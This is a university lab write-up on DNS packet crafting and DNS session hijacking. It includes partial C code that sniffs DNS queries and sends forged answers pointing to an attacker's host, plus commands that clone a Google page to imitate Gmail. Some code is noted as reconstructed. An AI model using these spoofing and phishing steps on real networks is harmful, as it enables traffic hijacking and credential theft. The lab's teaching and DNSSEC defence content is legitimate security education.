INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering

LAB 2: DNS attack (Part 1 + 2)
Course: Network Security
Lecturer: Pham Van Hau, PhD
Date: 24/09/2013
Duration: 180 minutes
Student ID: IT"#$#%&
Student name: '( N)* T+I

Introduction
To do the DNS hijacking attack, you need to know how to generate and capture packets programmatically, and to understand the UDP and DNS packet headers as well as the DNS protocol. The purpose of this lab is to give you hands-on experience in low-level network programming. More precisely, you are going to create the DNS request and response. These will help you a lot for the next lab.

In general, to generate raw packets you can use the pcap library (http://www.tcpdump.org/pcap.html), the Libnet library (http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html) or even the standard API (http://en.wikipedia.org/wiki/Berkeley_sockets). In the context of this lab, we use the pcap library. Several useful pieces of information can be found at http://www.tcpdump.org/pcap.html.

To get an idea of what a DNS packet looks like, on your Linux machine:
• open Wireshark to capture the traffic
• open a terminal and execute 'nslookup vnexpress.net'
Try to look at the different fields of the captured DNS packet and understand what they are used for. This link http://www.networksorcery.com/enp/protocol/dns.htm is also a great source for this purpose.

Part I: DNS packet generation
To help you with the programming, I have created two programs, called dns_request_gen.c and dns_response_gen.c. The programs I sent you are not complete. You need to modify them at several places (I have marked them as 'TO BE MODIFIED').

I. DNS packet request
Modify dns_request_gen.c to generate a DNS request that has
• source MAC: A1 A2 A3 A4 A5 A6
• destination MAC: B1 B2 B3 B4 B5 B6
• source port: 4777
• destination port: 53
• Transaction ID: AABB
• source IP address: 1.2.3.4
• destination IP address: 6.8.9.?
• DNS query asking for the IP address of 'vnexpress.net'
struct dns_header {
    u_short id;          /* transaction ID */
    u_short flags;       /* flags */
    u_short q_count;     /* number of question entries */
    u_short ans_count;   /* number of answer entries */
    u_short auth_count;  /* number of authority entries */
    u_short add_count;   /* number of resource entries */
};
void DNS_name_converter(char *host, char *dns){
    int len = strlen(host);
    dns[len + 1] = 0;       // terminating (root) label; the encoded name is host_len + 2 bytes long
    int count = 0;          // For counting the number of characters from the begin until a 'dot' is met
    while (len > 0) {       // While host name length is larger than zero
        if (host[len - 1] == '.')   // Count from the last character of the host name; if there is a 'dot'
        {
            dns[len] = count;       // Store the counted number into the dns name buffer
            count = 0;              // Set count to zero for the recount
        } else {
            dns[len] = host[len - 1];   // If the character is not a 'dot' store it into the dns name buffer
            count++;                    // Increase count
        }
        len--;                  // Decrease len
    }                           // When we get to the first character
    dns[0] = count;             // Store the final counter into the dns name buffer
}
/* ============ FUNCTIONS THAT CREATE THE CHECKSUM OF UDP, IP ============ */
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

unsigned short csum(unsigned short *buf, int nwords){
    unsigned long sum = 0;
    int i;
    for (i = 0; i < (nwords / 2); i++) sum += buf[i];   // nwords is a byte count: nwords/2 16-bit words are summed
    sum = (sum >> 16) + (sum & 0xffff);                 // fold the carry into the low 16 bits
    sum += (sum >> 16);
    return ~sum;
}

unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]){
    unsigned short udp_protocol = IPPROTO_UDP;   // 17; the source used its own UDP protocol constant here
    unsigned short padding = 0;
    unsigned long sum;
    int i;
    // Find out if the length of the data is even or odd. If odd, add a padding byte = 0 at the end of the packet
    if (len % 2 != 0) {
        padding = 1;
        ((unsigned char *) buff)[len] = 0;   // byte index, not a 16-bit word index (the original wrote buff[len])
    }
    // Initialize sum to zero
    sum = 0;
    // Sum all the buffer in 16 bit words
    for (i = 0; i < (len + padding) / 2; i++) sum += ntohs((unsigned short) buff[i]);
    // Sum the pseudo header which contains source ip, destination ip, protocol number and length
    for (i = 0; i < 2; i++) sum += ntohs((unsigned short) ip_src[i]);
    // The source listing stops here; the rest of the pseudo header and the fold follow the same scheme
    for (i = 0; i < 2; i++) sum += ntohs((unsigned short) ip_dst[i]);
    sum += udp_protocol;
    sum += len;
    // Fold the carries into 16 bits and return the one's complement in network byte order
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return htons((unsigned short) ~sum);
}
/* dns_request_gen.c: body of main(int argc, char *argv[]) */
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;              // session description
    bpf_u_int32 net;            // ip of device
    bpf_u_int32 mask;           // subnet mask
    int i, result, size_ip;
    u_char *host;               // host name to look up ip. EX: vnexpress.net
    char *dev;                  // network device to capture. EX: eth0
    u_char packet[5000];        // packet is the buffer that contains the data

    // checking for a suitable network device and store the ip, subnet mask for future use
    if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);

    // zero out the packet: [Ethernet] + [IP] + [TCP/UDP] + [Application]
    memset(packet, 0, sizeof(packet));   // packet is the array that holds the data

    /* ===================== Build a [DNS REQUEST] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    u_char *q_name;                 // pointer to the start of the query_name
    int host_len = strlen(host);    // the query name length is the number of characters of the host name (vnexpress.net has len=13)
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    int size_q_name = host_len + 2; // size of the query name (+2: leading length byte and terminating zero); the dns query header is 4 bytes

    /* ================ Set the pointers to the matching regions of the packet ================ */
    eth = (struct ethernet_header *)(packet);
    /**************************** TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /**************************** TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /**************************** TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    /* q_name and dns_qr must likewise be pointed just past the DNS header (not shown in the source) */

    /* DNS Header */
    dns->id = htons(0xAABB);          // transaction ID
    dns->flags = htons(0x0100);       // flags (standard query)
    dns->q_count = htons(1);          // number of questions
    dns->ans_count = 0;               // number of answers
    dns->auth_count = 0;              // number of authority
    dns->add_count = 0;               // number of resource

    /* DNS Query: query_name, dns query header */
    // Convert the hostname to dns format and store it in the memory where q_name points to
    DNS_name_converter(host, q_name);
    dns_qr->q_type = htons(1);        // type of the host (A)
    dns_qr->q_class = htons(1);       // class (IN)
/* dns_response_gen.c: inside main() */
    // checking for a suitable network device and store the ip, subnet mask for future use
    if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);

    /* ===================== Build a [DNS RESPONSE] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    u_char *q_name;                 // Dns name in the query
    struct dns_answer *dns_as;      // pointer to the start of the dns answer
    int host_len = strlen(host);    // Hostname length
    int size_q_name = host_len + 2; // size of the query name; the dns query header is 4 bytes

    /* ================ Set the pointers to the matching regions of the packet ================ */
    eth = (struct ethernet_header *)(packet);
    /**************************** TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /**************************** TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /**************************** TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));

    /* DNS Header */
    dns->id = htons(0xAABB);          // transaction ID (must equal the ID of the request being answered)
    dns->flags = htons(0x8180);       // flags (standard response, recursion desired and available)
    dns->q_count = htons(1);          // number of questions
    dns->ans_count = htons(1);        // number of answers
    dns->auth_count = 0;              // number of authority
    dns->add_count = 0;               // number of resource

    /* DNS Query: query_name, dns query header, dns query answer */
    // Convert the hostname to dns format and store it in the memory where q_name points to
    DNS_name_converter(host, q_name);
    dns_qr->q_type = htons(1);        // type of the host (A)
    dns_qr->q_class = htons(1);       // class (IN)

    bcopy("\xc0\x0c", dns_as->a_name, 2);          // compression pointer to the name at offset 12 (the question)
    dns_as->a_type = htons(1);                     // type of the host (A)
    dns_as->a_class = htons(1);                    // class (IN)
    bcopy("\x00\x00\x01\xc3", dns_as->a_ttl, 4);   // TTL 0x1c3 = 451 seconds
    dns_as->a_len = htons(4);                      // length of an IPv4 address
    /**************************** TO BE MODIFIED 4 ***************************/
    dns_as->a_addr.s_addr = inet_addr("111.65.248.132");   // host3's address (second octet partly illegible in the source)
Normal scenario: Hereafter are the steps for the user on Host1 to connect to a website, e.g. GMAIL
• On Host1, the user enters www.gmail.com in the browser
• Host1 asks host2 for the ip address of www.gmail.com
• Host2 returns the ip address of www.google.com (ipgoogle) to host1
• host1 connects to (ipgoogle)

Attack scenario
• The user enters www.gmail.com in the browser.
• Host3 sniffs the traffic on the wire and tries to do DNS session hijacking by racing against host2. In fact, it tries to provide a fake answer to host1 (Host3 returns its own ip address (ip3) instead of the actual ip address of gmail (ipgoogle) to host1).
• Host1 receives the fake answer from host3 and connects to host3 (ip3), believing that it is talking to www.google.com.

Task 1: Create a program running on host3, called dnsattack.c, which
• captures the network traffic and filters out the dns packets (get the code from Lab3-part1)
• creates the fake response packet with the information mentioned above (get the code from Lab3-part1)
• sends the fake packet to host1

To help you in creating the program, I sent you the example dnsattack.c program. You need to add the appropriate code at the different places where I have marked 'TO BE MODIFIED'.
Answer: Dntai_dns_attack_v1.c
#include <string.h>      //strlen
#include <stdlib.h>      //malloc
#include <sys/socket.h>  //you know what this is for
#include <arpa/inet.h>   //inet_addr , inet_ntoa , ntohs etc
#include <netinet/in.h>
#include <unistd.h>      //getpid
#include <pcap.h>
struct dns_header {
    u_short id;          /* transaction ID */
    u_short flags;       /* flags */
    u_short q_count;     /* number of question entries */
    u_short ans_count;   /* number of answer entries */
    u_short auth_count;  /* number of authority entries */
    u_short add_count;   /* number of resource entries */
};

pcap_t *handle;   /* packet capture handle */

/* functions */
void print_app_info(void);
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);
/* csum() and udp_csum() are the same functions as listed above for dns_request_gen.c */
        // copy the content of the captured packet to the new buffer
        ip = (struct ip_header *)(packet + SIZE_ETH);
        bcopy(packet, new_packet, ntohs(ip->ip_len) + SIZE_ETH);
        /* make sure we're capturing on an Ethernet device [2] */
        if (pcap_datalink(handle) != DLT_EN10MB) {
            fprintf(stderr, "%s is not an Ethernet\n", dev);
            exit(EXIT_FAILURE);
        }
        result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    } else {
        printf("[Packet not sent]\n");
    }
Task 2: Install a webserver on host3, create a home page to make it look like www.gmail.com
Answer: On host3:
    sudo apt-get install apache2
    sudo service apache2 start
    cd /var/www/
    sudo su root
    wget google.com -O index.html
Task 3: Test and make sure your attack works. On host3, run sudo ./dntai_dns_attack
Question 1: Compare the dns request and dns response with respect to
a) Source MAC address and Destination MAC address
b) IP source, IP destination
c) source port, destination port
Answer:
• Dns Request vs Dns Response about Mac Address
Request: (capture screenshot)
Response: (capture screenshot)
• Dns Request vs Dns Response about Ip Address
Request: (capture screenshot)
• Result: the dns request and response swap the mac address, ip address and port between source and destination.
Question 2: What is the role of the Transaction ID field of the DNS packet?
Answer: Transaction ID is a 16-bit field identifying a specific DNS transaction. The transaction ID is created by the message originator and is copied by the responder into its response message. Using the transaction ID, the DNS client can match responses to its requests.
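As an added example (not the lab's own code), the following C program builds the same wire format the lab's programs fill in by hand (label-encoded name, 12-byte header with ID AABB, question for vnexpress.net) and then applies the acceptance checks a resolver relies on: a reply is used only if the QR bit is set, the transaction ID matches and the question section is identical. The sample packets are constructed in memory; the buffer sizes and the forged ID value are assumptions for the demonstration.

```c
/* Added example (not the lab's code): DNS label encoding, query building and
 * the checks a resolver applies before accepting a reply; all data is in-memory. */
#include <stdint.h>
#include <string.h>
/* Encode "vnexpress.net" as \x09vnexpress\x03net\x00 (RFC 1035 labels), walking
 * forward rather than the lab's backward loop.  Returns bytes written
 * (host_len + 2), or 0 for an empty label or a label longer than 63 bytes. */
size_t dns_encode_name(const char *host, uint8_t *out, size_t cap)
{
    size_t n = strlen(host), pos = 0, start = 0;
    if (n == 0 || n + 2 > cap) return 0;
    for (size_t i = 0; i <= n; i++) {
        if (i < n && host[i] != '.') continue;      /* stop at '.' or end */
        size_t len = i - start;
        if (len == 0 || len > 63) return 0;
        out[pos++] = (uint8_t)len;                  /* length byte, then label */
        memcpy(out + pos, host + start, len);
        pos += len;
        start = i + 1;
    }
    out[pos++] = 0;                                 /* root label terminates */
    return pos;
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
/* 12-byte header (id, flags 0x0100 = standard query with RD, QDCOUNT = 1)
 * followed by QNAME, QTYPE = A, QCLASS = IN.  Returns the total length or 0. */
size_t dns_build_query(uint16_t id, const char *host, uint8_t *out, size_t cap)
{
    static const uint8_t tail[4] = { 0, 1, 0, 1 };
    if (cap < 16) return 0;
    size_t n = dns_encode_name(host, out + 12, cap - 16);
    if (n == 0) return 0;
    uint8_t hdr[12] = { id >> 8, id & 0xff, 0x01, 0x00, 0, 1, 0, 0, 0, 0, 0, 0 };
    memcpy(out, hdr, 12);
    memcpy(out + 12 + n, tail, 4);
    return 12 + n + 4;
}
/* A resolver accepts a reply only if the QR bit is set, the 16-bit ID equals
 * the one it sent and the question section is byte-for-byte its own.  A forged
 * reply raced against the real server must therefore guess the ID (and the
 * source port, which the UDP layer checks) or it is discarded. */
int dns_response_matches(const uint8_t *q, size_t qlen,
                         const uint8_t *r, size_t rlen)
{
    if (qlen < 16 || rlen < qlen) return 0;
    if (rd16(q) != rd16(r)) return 0;                   /* transaction ID */
    if ((rd16(r + 2) & 0x8000) == 0) return 0;          /* QR bit = response */
    if (rd16(q + 4) != 1 || rd16(r + 4) != 1) return 0; /* exactly one question */
    return memcmp(q + 12, r + 12, qlen - 12) == 0;      /* same name/type/class */
}
/* The lab's race: one genuine reply and one forged reply whose guessed ID is
 * off by one.  Returns bit0 = genuine accepted, bit1 = forged accepted. */
int demo_race(void)
{
    uint8_t q[64], good[64], fake[64];
    size_t ql = dns_build_query(0xAABB, "vnexpress.net", q, sizeof q);
    memcpy(good, q, ql); good[2] = 0x81; good[3] = 0x80; good[7] = 1; /* 0x8180, ANCOUNT 1 */
    memcpy(fake, good, ql); fake[1] = 0xBC;                            /* wrong ID */
    return dns_response_matches(q, ql, good, ql)
         | (dns_response_matches(q, ql, fake, ql) << 1);
}
```

demo_race() returns 1: the genuine reply is accepted and the forged one, which differs only in the transaction ID, is dropped.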
Question 3: Find a solution to prevent the dns session hijacking attack
Answer: A solution to prevent the dns session hijacking attack is DNSSEC: The Domain Name System Security Extensions (DNSSEC) is a suite of Internet Engineering Task Force (IETF) specifications for securing certain kinds of information provided by the Domain Name System (DNS) as used on Internet Protocol (IP) networks. It is a set of extensions to DNS which provide to DNS clients (resolvers) origin authentication of DNS data, authenticated denial of existence, and data integrity, but not availability or confidentiality. (Wiki)